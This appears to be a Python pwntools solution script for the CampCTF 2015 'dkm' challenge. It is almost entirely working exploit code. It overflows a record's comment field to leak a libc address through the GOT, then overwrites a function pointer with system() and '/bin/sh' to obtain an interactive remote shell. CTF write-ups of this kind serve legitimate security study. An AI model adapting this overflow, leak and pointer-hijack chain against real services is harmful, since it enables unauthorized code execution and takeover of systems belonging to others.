
CAMPCTF 2015 dkm

#!/usr/bin/env python

from pwn import *

# Target setup.  The challenge binary is x86-64; pack()/u64() further down
# rely on this context setting for word size and endianness.
context.update(arch='amd64')

elf = ELF('dkm.elf')

# GOT slot of __libc_start_main in dkm.elf.  NOTE(review): the variable is
# called `puts` and is referenced under that name by stage 1 below, but it is
# NOT the GOT entry of puts(); keep the name for the existing callers.
puts = elf.got['__libc_start_main']

# Local test harness (same binary served on a local port):
# r = remote("localhost", 5555)
r = remote("challs.campctf.ccc.ac", 10102)

# Discard the banner up to the first menu prompt.
r.recvuntil('> ')


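def send_menu(r, s):
    """Answer one menu prompt and wait for the next one.

    Sends ``s`` as one line on tube ``r``, echoes everything the target prints
    up to and including the next ``'> '`` prompt, and returns that text so a
    caller can inspect the response (the original discarded it).

    Args:
        r: pwntools tube, or any object exposing ``sendline``/``recvuntil``.
        s: menu choice or field value, without a trailing newline.

    Returns:
        The raw response received up to and including the next prompt.
    """
    r.sendline(s)
    resp = r.recvuntil('> ')
    print(resp)
    return resp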


# Menu walk that prepares the records the two overflow stages operate on.
# Each tuple is one pass through dkm's menu: an option number followed by the
# answers to that option's sub-prompts.  The option semantics are not visible
# in this script (presumably '2' adds an entry and '4' edits one -- confirm
# against the binary's menu text); what matters is that the last walk stops
# at the prompt which stage 1 then answers with its overflow payload.
walk_a = ('2', '1', '0', '0', '0', 'no comment')  # fifth answer: number of ssid
walk_b = ('4', '0', '2', '0', '0', 'no comment')
walk_c = ('4', '0', '3', '0', '0', '0')

for walk in (walk_a, walk_b, walk_a, walk_c):
    for answer in walk:
        send_menu(r, answer)


# Addresses and offsets shared by both stages.
libc_start_addr = 0          # filled in by stage 1 from the GOT leak

# Distance system - __libc_start_main in the *remote* libc (the value is
# added to the leaked __libc_start_main address).  It is specific to the libc
# build on the challenge host: if the leak works but no shell appears, this
# is the value to adjust or brute-force, as the original author notes.
SYSTEM_OFFSET = 0x23a80

# Address of the legitimate "show with wifi" handler inside dkm.elf.  The
# 0x400000 range suggests a non-PIE binary, i.e. stable across runs
# (TODO(review): confirm with checksec).
show_with_wifi = 0x4009F0


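# stage1> leak a libc address through the GOT
#
# The comment field overflows into the fixed fields that follow it in the
# record: 0x310 bytes of filler, then latitude, longitude, a "show" function
# pointer, an "edit" pointer and the SSID pointer (field names taken from the
# original author's annotations).  Redirecting the SSID pointer at the GOT
# slot of __libc_start_main makes the "show" action print the resolved libc
# address of that function.
comment = 'A' * 0x310
comment += pack(0)               # latitude
comment += pack(0)               # longitude
comment += pack(show_with_wifi)  # "show" pointer: keep the legitimate handler for now
comment += pack(0xdeadbeef)      # "edit" pointer, not exercised by this stage
comment += pack(puts)            # SSID pointer -> &got.__libc_start_main (NOT puts, despite the name)
comment += pack(0)

# The payload is sent newline-terminated, so the target reads it line-wise;
# a 0x0a byte inside one of the packed values would truncate the record.
# Fail loudly rather than send a corrupted layout.
if '\n' in comment:
    log.error('stage-1 payload contains a newline byte; it would be truncated')
r.send(comment + '\n')
print(r.recvuntil('> '))

r.sendline('1')                  # presumably "show": prints the record, including the redirected SSID
leak = r.recvuntil('> ')
print(leak)

if 'SSID: ' not in leak:
    log.error('no "SSID: " marker in the response; the overflow layout is probably wrong')
raw = leak.split('SSID: ')[1]
# A canonical x86-64 user-space pointer has 6 significant bytes.  If the
# server prints the SSID with a %s-style routine it stops at the first NUL,
# so fewer than 6 bytes means the leak was cut short and must not be trusted.
if len(raw) < 6:
    log.error('leak too short (%d bytes): %r' % (len(raw), raw))
libc_start_addr = u64(raw[:6].ljust(8, '\x00'))  # little-endian, top two bytes zero
system_addr = libc_start_addr + SYSTEM_OFFSET

print('libc_start at -{0}-'.format(hex(libc_start_addr)))
print('system at -{0}-'.format(hex(system_addr)))
if (libc_start_addr >> 40) != 0x7f:
    # Heuristic only: libc is normally mapped at 0x7fxx_xxxx_xxxx on x86-64 Linux.
    log.warn('leaked value %#x does not look like a libc address; check the GOT target/offsets' % libc_start_addr)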


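# stage2> overwrite the "show" pointer with system() and the latitude with "/bin/sh"
#
# Same menu walk as the last one before stage 1: select the record and stop
# at the comment prompt, then overflow the record a second time.
for answer in ('4', '0', '3', '0', '0', '0'):
    send_menu(r, answer)

shell_cmd = '/bin/sh\0'          # exactly 8 bytes: fills the latitude slot, NUL-terminated
comment = 'A' * 0x310
comment += shell_cmd             # latitude -> "/bin/sh" (presumably the record pointer becomes
                                 # system()'s argument, so its first field is the command -- confirm)
comment += pack(0)               # longitude
comment += pack(system_addr)     # change the "show" pointer to system
comment += pack(0xdeadbeef)      # edit
comment += pack(0)

# system_addr is ASLR-randomised.  If one of its bytes happens to be 0x0a the
# newline-terminated send cuts the payload short and the record is corrupted
# instead of hijacked; bail out so the run can simply be repeated.
if '\n' in comment:
    log.error('stage-2 payload contains a newline byte (system_addr=%#x); rerun the exploit' % system_addr)
r.send(comment + '\n')
print(r.recvuntil('> '))

r.sendline('1')                  # presumably "show": now calls system("/bin/sh")
r.interactive()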
